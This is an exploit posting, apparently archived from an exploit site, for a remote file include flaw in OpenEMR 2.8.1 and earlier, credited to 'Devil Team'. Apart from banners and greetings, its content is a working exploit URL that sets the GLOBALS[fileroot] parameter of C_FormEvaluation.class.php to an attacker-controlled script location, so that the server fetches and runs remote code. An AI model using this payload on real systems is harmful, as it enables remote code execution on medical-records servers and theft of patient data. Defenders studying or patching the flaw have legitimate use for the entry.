id: 497
date: 06/06/2006
title: OpenEMR <= 2.8.1 (fileroot) Remote File Include Vulnerability
author: Kacper
cves: 

=============================================================
OpenEMR <= 2.8.1 (fileroot) Remote File Include Vulnerability
=============================================================




$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  OpenEMR <= 2.8.1 Remote File Include Vulnerability
$$  Script site: http://sourceforge.net/projects/openemr/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:

http://www.site.com/[OpenEMR_path]/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=[evil_scripts]


#Pozdro dla wszystkich ;-)



#  0day.today [2023-03-26]  #